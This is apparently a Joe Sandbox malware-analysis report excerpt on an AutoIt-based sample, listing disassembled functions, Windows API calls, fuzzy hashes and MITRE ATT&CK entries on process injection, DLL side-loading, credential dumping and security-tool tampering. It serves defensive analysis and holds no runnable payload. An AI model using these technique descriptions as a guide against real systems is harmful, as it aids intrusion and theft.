Associated: 00000000.00000002.1481838791.0000000000ABE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481910281.0000000000ACA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481958838.0000000000AD4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_bIcqeSVPW6.jbxd

Similarity

API ID: MessageSend
String ID: Combobox
API String ID: 3850602802-2096851135
Opcode ID: 7585074ea88b6aeb50a2ead7064331e57edbacd5c02bb4c1deadb7ba2d2adc8a
Instruction ID: 5b7070dccb4a71e73c07fb11aab709067094c772c945f5f3253d3406238a1582
Opcode Fuzzy Hash: 7585074ea88b6aeb50a2ead7064331e57edbacd5c02bb4c1deadb7ba2d2adc8a
Instruction Fuzzy Hash: B81160B13106087FEF11DF54DC81EAB376EEB483A4F10812AF9199B2A0D6719C528760

Function 00A798FE Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 67COMMON

Download Yara Rule

APIs

Part of subcall function 00A2D17C: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00A2D1BA
Part of subcall function 00A2D17C: GetStockObject.GDI32(00000011), ref: 00A2D1CE
Part of subcall function 00A2D17C: SendMessageW.USER32(00000000,00000030,00000000), ref: 00A2D1D8

GetWindowRect.USER32(00000000,?), ref: 00A79968
GetSysColor.USER32(00000012), ref: 00A79982

Strings

static, xrefs: 00A79945

Memory Dump Source

Source File: 00000000.00000002.1481754944.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1481724647.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000A9D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000ABE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481910281.0000000000ACA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481958838.0000000000AD4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_bIcqeSVPW6.jbxd

Similarity

API ID: Window$ColorCreateMessageObjectRectSendStock
String ID: static
API String ID: 1983116058-2160076837
Opcode ID: c1915100b3664caeeeda0a2b6fa1667ed4c886b6b844d9362ee404924853af9c
Instruction ID: 497d783dce4cc2ccec3177556a0dc596048c8b2abc66304f8fc4b94a14cd4166
Opcode Fuzzy Hash: c1915100b3664caeeeda0a2b6fa1667ed4c886b6b844d9362ee404924853af9c
Instruction Fuzzy Hash: 8D113A72620209AFEB04DFB8CC45EEA7BB8FB48354F058629FA59D3151D734E851DB50

Function 00A79617 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 64windowCOMMON

Download Yara Rule

APIs

GetWindowTextLengthW.USER32(00000000), ref: 00A79699
SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 00A796A8

Strings

edit, xrefs: 00A7967D

Memory Dump Source

Source File: 00000000.00000002.1481754944.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1481724647.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000A9D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000ABE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481910281.0000000000ACA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481958838.0000000000AD4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_bIcqeSVPW6.jbxd

Similarity

API ID: LengthMessageSendTextWindow
String ID: edit
API String ID: 2978978980-2167791130
Opcode ID: 03a9f4b8cbee056ef261147639519489bb80bcdbb2c1ee6d419652c6bec703e7
Instruction ID: 461f521edbd87dd9cecc5308887d7425c50769cbdb57a8c49c807ea0a2843970
Opcode Fuzzy Hash: 03a9f4b8cbee056ef261147639519489bb80bcdbb2c1ee6d419652c6bec703e7
Instruction Fuzzy Hash: 07116A71100208AAEF119FA4DC44AEB3B6EEB053B8F10C726F969931E0C735DC519760

Function 00A55262 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00A552D5
GetMenuItemInfoW.USER32(00000030,?,00000000,00000030), ref: 00A552F4

Strings

0, xrefs: 00A552CE

Memory Dump Source

Source File: 00000000.00000002.1481754944.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1481724647.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000A9D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000ABE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481910281.0000000000ACA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481958838.0000000000AD4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_bIcqeSVPW6.jbxd

Similarity

API ID: InfoItemMenu_memset
String ID: 0
API String ID: 2223754486-4108050209
Opcode ID: 352c79c0d7732f4fce734dcab3bf2ceff5216d1f0680f82528d78a41e76fbece
Instruction ID: 1e2ba1bb8dac8c7ea25697938757a23ac0e4f58c1b920a46a4dd32a74158bf6a
Opcode Fuzzy Hash: 352c79c0d7732f4fce734dcab3bf2ceff5216d1f0680f82528d78a41e76fbece
Instruction Fuzzy Hash: 4D11E671E01614ABDB10DBB8D964BDD77F8BB05761F040025ED06EB2A0D7B0ED09CB90

Function 00A64D9F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 61networkCOMMON

Download Yara Rule

APIs

InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 00A64DF5
InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00A64E1E

Strings

<local>, xrefs: 00A64DE6

Memory Dump Source

Source File: 00000000.00000002.1481754944.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1481724647.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000A9D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000ABE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481910281.0000000000ACA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481958838.0000000000AD4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_bIcqeSVPW6.jbxd

Similarity

API ID: Internet$OpenOption
String ID: <local>
API String ID: 942729171-4266983199
Opcode ID: bc0c09abedf59321b1dd475efd94e9c74a5061750a8784db4b59caca3925b2f2
Instruction ID: 14fa3e2423be9d40da14ece5af92596fddbb7e90cfe19b11edfb4eaec7160eaa
Opcode Fuzzy Hash: bc0c09abedf59321b1dd475efd94e9c74a5061750a8784db4b59caca3925b2f2
Instruction Fuzzy Hash: C9117CB0A01221FBDB258FA1C889FFBFEB8FF1A755F10822AF51596140D7705991C6E0

Function 00A6A82C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 52networkCOMMON

Download Yara Rule

APIs

inet_addr.WSOCK32(00000000,00000000,?,?,?,00000000), ref: 00A6A84E
htons.WSOCK32(00000000,?,00000000), ref: 00A6A88B

Strings

255.255.255.255, xrefs: 00A6A866

Memory Dump Source

Source File: 00000000.00000002.1481754944.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1481724647.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000A9D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000ABE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481910281.0000000000ACA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481958838.0000000000AD4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_bIcqeSVPW6.jbxd

Similarity

API ID: htonsinet_addr
String ID: 255.255.255.255
API String ID: 3832099526-2422070025
Opcode ID: f3dcf20fd734a159f42b4485f5e8609b6da3fa0357a816d62a4a3611142d2dea
Instruction ID: 55452046fc431fe44e750dc584eced9c00805e6326ea6ecf1615015a088cb917
Opcode Fuzzy Hash: f3dcf20fd734a159f42b4485f5e8609b6da3fa0357a816d62a4a3611142d2dea
Instruction Fuzzy Hash: 0D01F575200304ABCB11DFA8C886FADB374FF54324F10842AF516AB2D1DB71E806CB56

Function 00A16430 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 51COMMON

Download Yara Rule

APIs

GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00A13DEE,00AD1148,?,?,?,?,?,00A13AA3,?), ref: 00A16471
_wcscat.LIBCMT ref: 00A85DDB

Strings

6, xrefs: 00A1648B

Memory Dump Source

Source File: 00000000.00000002.1481754944.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1481724647.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000A9D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000ABE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481910281.0000000000ACA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481958838.0000000000AD4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_bIcqeSVPW6.jbxd

Similarity

API ID: FullNamePath_wcscat
String ID: 6
API String ID: 2109976907-2794493375
Opcode ID: 378a006c176183a315c51e78e5b3a80044c4a43b5e0a63b377a6ab8e70d4a61a
Instruction ID: 84e68a9c11ea1c7c541249363e839255c7544e698899d79cca2c5ce06b92bb36
Opcode Fuzzy Hash: 378a006c176183a315c51e78e5b3a80044c4a43b5e0a63b377a6ab8e70d4a61a
Instruction Fuzzy Hash: 42115631A04109AB8B01FBB8CB41ECD73F9AF49394F104166B94AD7291DF70D7C98761

Function 00A4B781 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 51windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,000001A2,000000FF,?), ref: 00A4B7EF

Strings

ComboBox, xrefs: 00A4B78B
ListBox, xrefs: 00A4B7B9

Memory Dump Source

Source File: 00000000.00000002.1481754944.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1481724647.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000A9D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000ABE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481910281.0000000000ACA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481958838.0000000000AD4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_bIcqeSVPW6.jbxd

Similarity

API ID: MessageSend
String ID: ComboBox$ListBox
API String ID: 3850602802-1403004172
Opcode ID: 4c587b8b0f924ac9a95eae56484564a0a70a5e2a4809ed517902df6f286c3c91
Instruction ID: d66fe6c3d75f2b521ad9c72d4fb5a83e74c8ed139c6968c4facce1f2eb27ed77
Opcode Fuzzy Hash: 4c587b8b0f924ac9a95eae56484564a0a70a5e2a4809ed517902df6f286c3c91
Instruction Fuzzy Hash: 6901F779651114BBCB04EBA4CD52EFE3379BF85360B04061DF472A72D2EF74990887A4

Function 00A4B67D Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00000180,00000000,?), ref: 00A4B6EB

Strings

ComboBox, xrefs: 00A4B687
ListBox, xrefs: 00A4B6B5

Memory Dump Source

Source File: 00000000.00000002.1481754944.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1481724647.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000A9D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000ABE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481910281.0000000000ACA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481958838.0000000000AD4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_bIcqeSVPW6.jbxd

Similarity

API ID: MessageSend
String ID: ComboBox$ListBox
API String ID: 3850602802-1403004172
Opcode ID: 343e68dd8a819d9b5d5a04d5d7254ff3315212d843ae1a3f9d60a03f51f3ebd1
Instruction ID: 6df510414a8b064ffa4b70ec9a92df2bbc528cbb02d4605eaca0e58410a9a217
Opcode Fuzzy Hash: 343e68dd8a819d9b5d5a04d5d7254ff3315212d843ae1a3f9d60a03f51f3ebd1
Instruction Fuzzy Hash: AC016279691104BBCB04EBA4CA52FFE73B99F45344F11001DB502B31D1DF649E1897B5

Function 00A4B700 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 48windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00000182,?,00000000), ref: 00A4B76C

Strings

ComboBox, xrefs: 00A4B70A
ListBox, xrefs: 00A4B738

Memory Dump Source

Source File: 00000000.00000002.1481754944.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1481724647.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000A9D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000ABE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481910281.0000000000ACA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481958838.0000000000AD4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_bIcqeSVPW6.jbxd

Similarity

API ID: MessageSend
String ID: ComboBox$ListBox
API String ID: 3850602802-1403004172
Opcode ID: bb058f3b29b9be305db036349aaf4199a338a3026759f794a1825d54d6d63529
Instruction ID: e133a691e7de886c2e954d84d81d3896cf87c0ac94e1fa7eb146c00c6a36d856
Opcode Fuzzy Hash: bb058f3b29b9be305db036349aaf4199a338a3026759f794a1825d54d6d63529
Instruction Fuzzy Hash: F0018179681104BBCB04EBA4CA52FFE73BC9B55354F500019B402B31D2DB649E5987B5

Function 00A57744 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 28COMMON

Download Yara Rule

APIs

GetClassNameW.USER32(?,?,00000100), ref: 00A57762
_wcscmp.LIBCMT ref: 00A57774

Strings

#32770, xrefs: 00A5776E

Memory Dump Source

Source File: 00000000.00000002.1481754944.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1481724647.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000A9D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000ABE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481910281.0000000000ACA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481958838.0000000000AD4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_bIcqeSVPW6.jbxd

Similarity

API ID: ClassName_wcscmp
String ID: #32770
API String ID: 2292705959-463685578
Opcode ID: ca6b709a591b2c788948fc7242e9960ef51142fe82d1527f50ebc5f8c7b00f61
Instruction ID: 79ffe0c20673c5554c92c50a81dd1b5852743b88df706ddce88c9c614b8b5cb1
Opcode Fuzzy Hash: ca6b709a591b2c788948fc7242e9960ef51142fe82d1527f50ebc5f8c7b00f61
Instruction Fuzzy Hash: C4E092776042242BDB10EBE5AC09E8BFBACAB55764F01005AB905E3041D670A64587E0

Function 00A4A631 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 22windowCOMMON

Download Yara Rule

APIs

MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 00A4A63F

Part of subcall function 00A313F1: _doexit.LIBCMT ref: 00A313FB

Strings

AutoIt, xrefs: 00A4A633
Error allocating memory., xrefs: 00A4A638

Memory Dump Source

Source File: 00000000.00000002.1481754944.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1481724647.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000A9D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000ABE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481910281.0000000000ACA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481958838.0000000000AD4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_bIcqeSVPW6.jbxd

Similarity

API ID: Message_doexit
String ID: AutoIt$Error allocating memory.
API String ID: 1993061046-4017498283
Opcode ID: a927036284ccf28e98b5e1e909e95ef1b233bde55fc368f34a550d82b954ff6d
Instruction ID: 33596f9173e32da32e5985a0a1824aebf89a2aad3a6a77a993e188479e0bf083
Opcode Fuzzy Hash: a927036284ccf28e98b5e1e909e95ef1b233bde55fc368f34a550d82b954ff6d
Instruction Fuzzy Hash: 76D05B313C472837D21436EC7D17FC575489B59B51F050427BB0C9A5C24DE2D99042E9

Function 00A8AE86 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21COMMON

Download Yara Rule

APIs

GetSystemDirectoryW.KERNEL32(?), ref: 00A8ACC0
FreeLibrary.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000104), ref: 00A8AEBD

Strings

WIN_XPe, xrefs: 00A8ACD3

Memory Dump Source

Source File: 00000000.00000002.1481754944.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1481724647.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000A9D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000ABE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481910281.0000000000ACA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481958838.0000000000AD4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_bIcqeSVPW6.jbxd

Similarity

API ID: DirectoryFreeLibrarySystem
String ID: WIN_XPe
API String ID: 510247158-3257408948
Opcode ID: 2e127d0aadc7a27ba45ad3cdfa2767ee86e8ca22051b21542818e4c599643d6a
Instruction ID: 6e01151213ec99338baeccece46ec96e19a937c63b2cc73b0d194ab29a546712
Opcode Fuzzy Hash: 2e127d0aadc7a27ba45ad3cdfa2767ee86e8ca22051b21542818e4c599643d6a
Instruction Fuzzy Hash: 32E06DB0C00109EFEB11EBE8D944AECF7B8AB68300F108083E002B2260CB304A85DF32

Function 00A78698 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON

Download Yara Rule

APIs

FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00A786A2
PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 00A786B5

Part of subcall function 00A57A58: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00A57AD0

Strings

Shell_TrayWnd, xrefs: 00A7869B

Memory Dump Source

Source File: 00000000.00000002.1481754944.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1481724647.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000A9D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000ABE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481910281.0000000000ACA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481958838.0000000000AD4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_bIcqeSVPW6.jbxd

Similarity

API ID: FindMessagePostSleepWindow
String ID: Shell_TrayWnd
API String ID: 529655941-2988720461
Opcode ID: 00fdc1a0d3ac0d334f301907cd618e2e9cae460d6663d1ee9a0f05ff096d005b
Instruction ID: 389ae432f2c12bd25081dce8605d07c9a3d7964549b6cec32c635ff4c8258bb9
Opcode Fuzzy Hash: 00fdc1a0d3ac0d334f301907cd618e2e9cae460d6663d1ee9a0f05ff096d005b
Instruction Fuzzy Hash: 20D01272394318BBE664B7B0AC0BFCA7A18AF14B11F11081AB749AA1D0CDF4E981C754

Function 00A786CC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON

Download Yara Rule

APIs

FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00A786E2
PostMessageW.USER32(00000000), ref: 00A786E9

Part of subcall function 00A57A58: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00A57AD0

Strings

Shell_TrayWnd, xrefs: 00A786DB

Memory Dump Source

Source File: 00000000.00000002.1481754944.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1481724647.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000A9D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000ABE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481910281.0000000000ACA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481958838.0000000000AD4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_bIcqeSVPW6.jbxd

Similarity

API ID: FindMessagePostSleepWindow
String ID: Shell_TrayWnd
API String ID: 529655941-2988720461
Opcode ID: c069c34029e5d605872e74ba7b75d09f9411903410ebdf07bdc1c32b9243d0fc
Instruction ID: 3c7d995b0b0c495157a90d75af1b34af18e8e72daab69b87bcf7b22bd069da46
Opcode Fuzzy Hash: c069c34029e5d605872e74ba7b75d09f9411903410ebdf07bdc1c32b9243d0fc
Instruction Fuzzy Hash: 9CD012723853187BF664B7B0AC0BFCA7A18AB14B11F11081AB745EA1D0CDF4E981C754

Description:	Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access, network devices, and remote desktop.Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.
Tactics:	Defense Evasion, Initial Access, Persistence, Privilege Escalation
Data Sources:	Logon Session: Logon Session Creation, Logon Session: Logon Session Metadata, User Account: User Account Authentication
Platforms:	Azure AD, Containers, Google Workspace, IaaS, Linux, macOS, Network, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in an attempt to elevate privileges. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. Security constructs such as permission levels will often hinder access to information and use of certain techniques, so adversaries will likely need to perform privilege escalation to include use of software exploitation to circumvent those restrictions.
Tactics:	Privilege Escalation
Data Sources:	Driver: Driver Load, Process: Process Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may circumvent mechanisms designed to control elevate privileges to gain higher-level permissions. Most modern systems contain native elevation control mechanisms that are intended to limit privileges that a user can perform on a machine. Authorization has to be granted to specific users in order to perform tasks that can be considered of higher risk. An adversary can perform several methods to take advantage of built-in control mechanisms in order to escalate privileges on a system.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Modification, Windows Registry: Windows Registry Key Modification
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
